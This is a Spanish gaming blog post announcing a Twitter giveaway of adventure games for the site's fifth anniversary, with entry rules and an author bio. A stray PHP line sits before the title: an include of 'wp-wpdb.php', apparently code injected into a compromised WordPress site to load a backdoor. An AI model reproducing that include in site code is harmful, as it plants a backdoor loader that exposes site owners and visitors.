if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Sorteo 5 Aniversario de La Fortaleza de LeChuck – La Fortaleza de LeChuck

Sorteo 5 Aniversario de La Fortaleza de LeChuck

El próximo domingo este humilde blog cumplirá 5 años. Media década de análisis, reportajes, retro, opiniones, etc. Siempre intentando tratar de forma cercana y personal el mundo del videojuego sin ser una mera wikipedia. No sé si lo hemos conseguido, pero seguiremos remando con vosotros hasta encontrar el secreto de Monkey Island. Para premiar vuestra confianza, hemos organizado un sorteo.

5aniversario

Vamos a sortear un pack sorpresa de aventuras en formato físico entre todos aquellos que nos hagan follow en nuestro twitter de @Lechuuck y lancen el siguiente tweet:

Quiero ganar el pack de aventuras que sortea La Fortaleza de @Lechuuck por su quinto aniversario #LeChuck5

Si haces click sobre este enlace lo escribe automáticamente (solo tienes que darle a «tweet»)

El sorteo finalizará el domingo a las 23:00h y el ganador será anunciado en nuestro Twitter. Importante: Solo podrán participar aquellos que residan en España.

¡Suerte!

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

2 comentarios

Dejar un comentario